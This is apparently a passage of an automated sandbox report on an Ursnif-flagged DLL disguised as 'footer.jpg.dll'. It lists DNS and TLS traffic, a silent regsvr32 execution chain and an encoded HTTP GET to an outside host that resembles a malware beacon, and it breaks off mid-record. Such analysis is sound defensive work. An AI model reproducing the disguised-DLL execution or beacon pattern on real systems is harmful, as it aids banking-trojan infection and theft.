Feb 10, 2021 08:00:02.613531113 CET	53	51255	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:02.883302927 CET	61522	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:02.936345100 CET	53	61522	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:03.074212074 CET	52337	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:03.141350031 CET	53	52337	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:03.500111103 CET	55046	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:03.558917046 CET	53	55046	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:03.682466030 CET	49612	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:03.731393099 CET	53	49612	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:03.798084974 CET	49285	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:03.846616030 CET	53	49285	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:04.778845072 CET	50601	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:04.836524010 CET	53	50601	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:06.265953064 CET	60875	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:06.323729038 CET	53	60875	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:07.288892031 CET	56448	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:07.337691069 CET	53	56448	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:11.562342882 CET	59172	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:11.611310005 CET	53	59172	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:13.146342993 CET	62420	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:13.203633070 CET	53	62420	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:15.510276079 CET	60579	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:15.559256077 CET	53	60579	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:16.537668943 CET	50183	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:16.561140060 CET	61531	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:16.587007999 CET	53	50183	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:16.610327959 CET	53	61531	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:17.515517950 CET	49228	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:17.566530943 CET	53	49228	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:21.474693060 CET	59794	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:21.532968044 CET	53	59794	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:23.190774918 CET	55916	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:23.263197899 CET	53	55916	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:28.139267921 CET	52752	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:28.203318119 CET	53	52752	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:28.965183020 CET	60542	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:29.035183907 CET	53	60542	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:29.153306961 CET	52752	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:29.204880953 CET	53	52752	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:29.981064081 CET	60542	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:30.050852060 CET	53	60542	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:30.256158113 CET	52752	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:30.316346884 CET	53	52752	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:31.000231028 CET	60542	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:31.048908949 CET	53	60542	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:32.252814054 CET	52752	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:32.314445019 CET	53	52752	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:33.002341032 CET	60542	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:33.061996937 CET	53	60542	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:36.262620926 CET	52752	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:36.322523117 CET	53	52752	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:36.798854113 CET	60689	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:36.857542992 CET	53	60689	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:37.011910915 CET	60542	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:37.062449932 CET	53	60542	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:37.468275070 CET	64206	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:37.506395102 CET	50904	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:37.528587103 CET	53	64206	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:37.563957930 CET	53	50904	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:37.733607054 CET	57525	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:37.807235003 CET	53	57525	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:38.126596928 CET	53814	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:38.178384066 CET	53	53814	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:38.666368961 CET	53418	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:38.738888025 CET	53	53418	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:39.292385101 CET	62833	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:39.344167948 CET	53	62833	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:40.001787901 CET	59260	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:40.062717915 CET	53	59260	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:41.119447947 CET	49944	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:41.178226948 CET	53	49944	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:41.437294006 CET	63300	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:41.488898993 CET	53	63300	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:42.126233101 CET	61449	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:42.183365107 CET	53	61449	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:43.158730984 CET	51275	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:43.215976954 CET	53	51275	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:44.089356899 CET	63492	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:44.146420002 CET	53	63492	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:51.741687059 CET	58945	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:51.790473938 CET	53	58945	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:51.858728886 CET	60779	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:51.930464029 CET	53	60779	8.8.8.8	192.168.2.4
Feb 10, 2021 08:00:54.556945086 CET	64014	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:00:54.615498066 CET	53	64014	8.8.8.8	192.168.2.4
Feb 10, 2021 08:01:00.103555918 CET	57091	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:01:00.164751053 CET	53	57091	8.8.8.8	192.168.2.4
Feb 10, 2021 08:01:28.065774918 CET	55904	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:01:28.114415884 CET	53	55904	8.8.8.8	192.168.2.4
Feb 10, 2021 08:01:29.749552965 CET	52109	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:01:29.801068068 CET	53	52109	8.8.8.8	192.168.2.4
Feb 10, 2021 08:01:30.021754026 CET	54450	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:01:30.081919909 CET	53	54450	8.8.8.8	192.168.2.4
Feb 10, 2021 08:01:30.743726015 CET	52109	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:01:30.803917885 CET	53	52109	8.8.8.8	192.168.2.4
Feb 10, 2021 08:01:31.750775099 CET	52109	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:01:31.802397966 CET	53	52109	8.8.8.8	192.168.2.4
Feb 10, 2021 08:01:33.766541004 CET	52109	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:01:33.826400995 CET	53	52109	8.8.8.8	192.168.2.4
Feb 10, 2021 08:01:37.771157980 CET	52109	53	192.168.2.4	8.8.8.8
Feb 10, 2021 08:01:37.831059933 CET	53	52109	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 10, 2021 07:59:59.411058903 CET	192.168.2.4	8.8.8.8	0xa1a9	Standard query (0)	www.msn.com	A (IP address)	IN (0x0001)
Feb 10, 2021 08:00:01.611608028 CET	192.168.2.4	8.8.8.8	0x8777	Standard query (0)	contextual.media.net	A (IP address)	IN (0x0001)
Feb 10, 2021 08:00:01.877788067 CET	192.168.2.4	8.8.8.8	0x85a4	Standard query (0)	web.vortex.data.msn.com	A (IP address)	IN (0x0001)
Feb 10, 2021 08:00:02.543351889 CET	192.168.2.4	8.8.8.8	0xe0c4	Standard query (0)	lg3.media.net	A (IP address)	IN (0x0001)
Feb 10, 2021 08:00:03.074212074 CET	192.168.2.4	8.8.8.8	0xb553	Standard query (0)	hblg.media.net	A (IP address)	IN (0x0001)
Feb 10, 2021 08:00:03.500111103 CET	192.168.2.4	8.8.8.8	0x6961	Standard query (0)	cvision.media.net	A (IP address)	IN (0x0001)
Feb 10, 2021 08:00:03.682466030 CET	192.168.2.4	8.8.8.8	0x2400	Standard query (0)	geolocation.onetrust.com	A (IP address)	IN (0x0001)
Feb 10, 2021 08:00:03.798084974 CET	192.168.2.4	8.8.8.8	0x7878	Standard query (0)	srtb.msn.com	A (IP address)	IN (0x0001)
Feb 10, 2021 08:00:04.778845072 CET	192.168.2.4	8.8.8.8	0x663b	Standard query (0)	img.img-taboola.com	A (IP address)	IN (0x0001)
Feb 10, 2021 08:01:00.103555918 CET	192.168.2.4	8.8.8.8	0x6fe6	Standard query (0)	ocsp.sca1b.amazontrust.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 10, 2021 07:59:59.459939957 CET	8.8.8.8	192.168.2.4	0xa1a9	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Feb 10, 2021 08:00:01.682307959 CET	8.8.8.8	192.168.2.4	0x8777	No error (0)	contextual.media.net		184.30.24.22	A (IP address)	IN (0x0001)
Feb 10, 2021 08:00:01.949915886 CET	8.8.8.8	192.168.2.4	0x85a4	No error (0)	web.vortex.data.msn.com	web.vortex.data.microsoft.com		CNAME (Canonical name)	IN (0x0001)
Feb 10, 2021 08:00:02.613531113 CET	8.8.8.8	192.168.2.4	0xe0c4	No error (0)	lg3.media.net		184.30.24.22	A (IP address)	IN (0x0001)
Feb 10, 2021 08:00:03.141350031 CET	8.8.8.8	192.168.2.4	0xb553	No error (0)	hblg.media.net		184.30.24.22	A (IP address)	IN (0x0001)
Feb 10, 2021 08:00:03.558917046 CET	8.8.8.8	192.168.2.4	0x6961	No error (0)	cvision.media.net	cvision.media.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Feb 10, 2021 08:00:03.731393099 CET	8.8.8.8	192.168.2.4	0x2400	No error (0)	geolocation.onetrust.com		104.20.185.68	A (IP address)	IN (0x0001)
Feb 10, 2021 08:00:03.731393099 CET	8.8.8.8	192.168.2.4	0x2400	No error (0)	geolocation.onetrust.com		104.20.184.68	A (IP address)	IN (0x0001)
Feb 10, 2021 08:00:03.846616030 CET	8.8.8.8	192.168.2.4	0x7878	No error (0)	srtb.msn.com	www.msn.com		CNAME (Canonical name)	IN (0x0001)
Feb 10, 2021 08:00:03.846616030 CET	8.8.8.8	192.168.2.4	0x7878	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Feb 10, 2021 08:00:04.836524010 CET	8.8.8.8	192.168.2.4	0x663b	No error (0)	img.img-taboola.com	tls13.taboola.map.fastly.net		CNAME (Canonical name)	IN (0x0001)
Feb 10, 2021 08:00:04.836524010 CET	8.8.8.8	192.168.2.4	0x663b	No error (0)	tls13.taboola.map.fastly.net		151.101.1.44	A (IP address)	IN (0x0001)
Feb 10, 2021 08:00:04.836524010 CET	8.8.8.8	192.168.2.4	0x663b	No error (0)	tls13.taboola.map.fastly.net		151.101.65.44	A (IP address)	IN (0x0001)
Feb 10, 2021 08:00:04.836524010 CET	8.8.8.8	192.168.2.4	0x663b	No error (0)	tls13.taboola.map.fastly.net		151.101.129.44	A (IP address)	IN (0x0001)
Feb 10, 2021 08:00:04.836524010 CET	8.8.8.8	192.168.2.4	0x663b	No error (0)	tls13.taboola.map.fastly.net		151.101.193.44	A (IP address)	IN (0x0001)
Feb 10, 2021 08:01:00.164751053 CET	8.8.8.8	192.168.2.4	0x6fe6	No error (0)	ocsp.sca1b.amazontrust.com		143.204.15.36	A (IP address)	IN (0x0001)
Feb 10, 2021 08:01:00.164751053 CET	8.8.8.8	192.168.2.4	0x6fe6	No error (0)	ocsp.sca1b.amazontrust.com		143.204.15.47	A (IP address)	IN (0x0001)
Feb 10, 2021 08:01:00.164751053 CET	8.8.8.8	192.168.2.4	0x6fe6	No error (0)	ocsp.sca1b.amazontrust.com		143.204.15.29	A (IP address)	IN (0x0001)
Feb 10, 2021 08:01:00.164751053 CET	8.8.8.8	192.168.2.4	0x6fe6	No error (0)	ocsp.sca1b.amazontrust.com		143.204.15.203	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

ocsp.sca1b.amazontrust.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49807	143.204.15.36	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 10, 2021 08:01:00.240350962 CET	7072	OUT	GET /images/6dayin3l_2BW7S5N/Gnz0LZyN5g7qBCp/B248LI31NTm818fYOn/fysFBCtAX/mFx67NJKGVDz3pFMjIdO/XoUT0M9jZwrwMgD0uAp/CgYK6Ygv23owJGncqjZFiC/pOwFjCE84YiD0/1phiKHMB/f6QyQEHF3TG2tTdcJHXtR52/qEFsUyav_2/BP9zanZDbdL9eB1Zb/YFBtE8bSAfxP/4sQIJiENwsY/qwZf6.avi HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: ocsp.sca1b.amazontrust.com Connection: Keep-Alive
Feb 10, 2021 08:01:00.552654028 CET	7072	IN	HTTP/1.1 200 OK Content-Type: application/ocsp-response Content-Length: 5 Connection: keep-alive Accept-Ranges: bytes Cache-Control: public, max-age=300 Date: Wed, 10 Feb 2021 07:01:00 GMT ETag: "5f4e9b00-5" Last-Modified: Tue, 01 Sep 2020 19:03:28 GMT Server: nginx X-Cache: Miss from cloudfront Via: 1.1 ab6f11597d22bd0292d6b657e4418dd2.cloudfront.net (CloudFront) X-Amz-Cf-Pop: MXP64-C1 X-Amz-Cf-Id: spCVPGTepeaiucK59DnidPQ8V2elZIq74BRZT0KSMlzLyRCqTfwW2w== Data Raw: 30 03 0a 01 06 Data Ascii: 0

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Feb 10, 2021 08:00:03.836044073 CET	104.20.185.68	443	192.168.2.4	49764	CN=*.onetrust.com, O=OneTrust LLC, L=Sandy Springs, ST=Georgia, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu May 21 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013	Wed Jul 27 14:00:00 CEST 2022 Wed Mar 08 13:00:00 CET 2023	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Feb 10, 2021 08:00:03.836044073 CET	104.20.185.68	443	192.168.2.4	49764	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Mar 08 13:00:00 CET 2013	Wed Mar 08 13:00:00 CET 2023		9e10692f1b7f78228b2d4e424db3a98c
Feb 10, 2021 08:00:03.841238022 CET	104.20.185.68	443	192.168.2.4	49763	CN=*.onetrust.com, O=OneTrust LLC, L=Sandy Springs, ST=Georgia, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu May 21 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013	Wed Jul 27 14:00:00 CEST 2022 Wed Mar 08 13:00:00 CET 2023	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Feb 10, 2021 08:00:03.841238022 CET	104.20.185.68	443	192.168.2.4	49763	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Mar 08 13:00:00 CET 2013	Wed Mar 08 13:00:00 CET 2023		9e10692f1b7f78228b2d4e424db3a98c
Feb 10, 2021 08:00:05.058921099 CET	151.101.1.44	443	192.168.2.4	49767	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Feb 10, 2021 08:00:05.058921099 CET	151.101.1.44	443	192.168.2.4	49767	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Feb 10, 2021 08:00:05.064755917 CET	151.101.1.44	443	192.168.2.4	49770	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Feb 10, 2021 08:00:05.064755917 CET	151.101.1.44	443	192.168.2.4	49770	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Feb 10, 2021 08:00:05.065037966 CET	151.101.1.44	443	192.168.2.4	49768	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Feb 10, 2021 08:00:05.065037966 CET	151.101.1.44	443	192.168.2.4	49768	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Feb 10, 2021 08:00:05.065707922 CET	151.101.1.44	443	192.168.2.4	49772	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Feb 10, 2021 08:00:05.065707922 CET	151.101.1.44	443	192.168.2.4	49772	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Feb 10, 2021 08:00:05.065821886 CET	151.101.1.44	443	192.168.2.4	49769	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Feb 10, 2021 08:00:05.065821886 CET	151.101.1.44	443	192.168.2.4	49769	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Feb 10, 2021 08:00:05.067105055 CET	151.101.1.44	443	192.168.2.4	49771	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Feb 10, 2021 08:00:05.067105055 CET	151.101.1.44	443	192.168.2.4	49771	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6024 Parent PID: 3028

General

Start time:	07:59:56
Start date:	10/02/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\footer.jpg.dll'
Imagebase:	0xdb0000
File size:	121856 bytes
MD5 hash:	99D621E00EFC0B8F396F38D5555EB078
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: regsvr32.exe PID: 4164 Parent PID: 6024

General

Start time:	07:59:56
Start date:	10/02/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe /s C:\Users\user\Desktop\footer.jpg.dll
Imagebase:	0x1180000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.735284219.0000000005258000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.735314560.0000000005258000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.735145270.0000000005258000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.735337124.0000000005258000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.735348930.0000000005258000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.735180520.0000000005258000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000002.1037755349.0000000005258000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.735370244.0000000005258000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.735214761.0000000005258000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: cmd.exe PID: 5876 Parent PID: 6024

General

Start time:	07:59:57
Start date:	10/02/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 6808 Parent PID: 5876

General

Start time:	07:59:57
Start date:	10/02/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Internet Explorer\iexplore.exe
Imagebase:	0x7ff78b070000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 4984 Parent PID: 6808

General

Start time:	07:59:57
Start date:	10/02/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6808 CREDAT:17410 /prefetch:2
Imagebase:	0xba0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 768 Parent PID: 6808

General

Start time:	08:00:21
Start date:	10/02/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6808 CREDAT:82962 /prefetch:2
Imagebase:	0xba0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 4928 Parent PID: 6808

General

Start time:	08:00:58
Start date:	10/02/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
